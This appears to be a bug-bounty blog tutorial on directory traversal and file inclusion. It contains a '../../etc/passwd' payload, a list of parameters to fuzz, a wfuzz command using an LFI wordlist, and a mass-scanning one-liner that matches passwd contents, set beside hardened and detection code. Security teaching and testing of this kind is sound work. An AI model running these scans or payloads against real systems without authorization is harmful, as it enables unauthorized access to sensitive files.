Unmasking Directory Traversal: Navigating Vulnerabilities in Web Applications (Techniques + Reports)
In web applications, inadequate input validation can lead to Directory Traversal vulnerabilities. If file operations are conducted using unchecked user-provided data, adversaries can potentially modify file paths, enabling them to access unauthorized directories. Such breaches can result in the unauthorized extraction of confidential data from the system.
What is the difference between directory listing, directory traversal, and file inclusion vulnerabilities?
1. Directory Listing:
Description: Directory listing refers to the ability of a user to view a list of files and directories on a web server, typically because the server is misconfigured and doesn't prevent this default behavior.
Impact: If directory listing is enabled, an attacker can view files that might not be intended for public access. This can lead to information disclosure, such as viewing configuration files, backup files, or other sensitive data.
Example: Visiting http://example.com/images/ and seeing a list of all image files because there's no index page and directory listing is enabled.
2. Directory Traversal (also known as Path Traversal):
Description: Directory traversal vulnerabilities occur when an application uses unsanitized user input to access files and directories. Attackers can exploit this to access files outside of the intended directory.
Impact: Attackers can read sensitive files on the server, potentially leading to information disclosure, or in some cases, even execute commands.
Example: Modifying a URL parameter like http://example.com/loadFile?filename=profile.jpg to http://example.com/loadFile?filename=../../etc/passwd to access the system's password file.
3. File Inclusion Vulnerability:
Description: File inclusion vulnerabilities arise when an application includes a file without properly sanitizing the input. There are two types: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI involves including files that are locally available on the server, while RFI involves including remote files from external servers.
Impact: This can lead to various attacks, such as code execution, information disclosure, or even server takeover, especially if the included file contains executable code.
Example: An application that has a page http://example.com/index.php?page=about.php might be vulnerable if an attacker can change about.php to a malicious file path or URL, leading the server to include and execute it.
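Added example, not code from the original post: the loadFile?filename= handler above in its vulnerable shape next to a hardened version that only serves paths resolving under an assumed upload root, plus the decoded-input check a defender can run over query parameter values. BASE_DIR and the function names are assumptions.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed example: an assumed upload root for the loadFile?filename= handler.
BASE_DIR = "/var/www/app/uploads"


def load_file_vulnerable(filename: str) -> str:
    """The vulnerable pattern: user input joined straight onto the base directory.
    '../../../../../../etc/passwd' walks out of BASE_DIR and ends at /etc/passwd."""
    return os.path.normpath(os.path.join(BASE_DIR, filename))


def resolve_safely(filename: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the absolute path only if it stays inside base_dir, else None.

    Decodes percent-encoding twice so %2e%2e%2f and %252e%252e%252f are seen
    as '../', rejects embedded NUL bytes, resolves symlinks with realpath so a
    planted link cannot point outside, and compares against base + separator
    so a sibling such as /var/www/app/uploads2 is not accepted as a prefix.
    """
    decoded = unquote(unquote(filename))
    if "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when the input is absolute (e.g. '/etc/passwd'),
    # which is exactly why the containment check below is needed.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


def looks_like_traversal(param_value: str) -> bool:
    """Detection-side check for a query parameter value: flags a '../' (or '..\\')
    sequence after decoding, which the ?file= / ?page= payloads above rely on."""
    decoded = unquote(unquote(param_value)).replace("\\", "/")
    return "../" in decoded
```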
How to find a vulnerable directory traversal endpoint
- Turn on Burp and visit the target website
- Go through the website and capture all the exchanges in Burp
- Find interesting endpoints such as [1]:
?cat=
?dir=
?action=
?board=
?date=
?detail=
?file=
?download=
?path=
?folder=
?prefix=
?include=
?page=
?inc=
?locate=
?show=
?doc=
?site=
?type=
?view=
?content=
?document=
?layout=
?mod=
?conf=
- Fuzz it using Burp Intruder or wfuzz:
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://<URL>?file=../../../../../../../../../../FUZZ
- Anything that stands out in the response is your payload; modify it to demonstrate impact and get the sensitive data out of the system.
One-liner:
cat hosts | gau | gf lfi | httpx -paths wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
Cheat sheets to use:
- https://book.hacktricks.xyz/pentesting-web/file-inclusion
- https://hacktricks.boitatech.com.br/pentesting-web/file-inclusion
Bug Bounty Reports
- https://hackerone.com/reports/733072 ($12000)
- https://hackerone.com/reports/205481
- https://hackerone.com/reports/1007799
- https://hacklido.com/blog/356-lfi-an-interesting-tweak
- …
More: https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPFILEREADING.md
References:
- https://humbertojunior.com.br/infosec/pentest/2021/02/16/lfi-parameters.html
- https://github.com/0xPugazh/One-Liners
I have a small request for all of you: I always write articles on many security topics, so if you don't follow me yet, follow me first and clap for this article, because that gives me the motivation to write something new!!
If you do not follow me on social media, here are my Twitter and LinkedIn.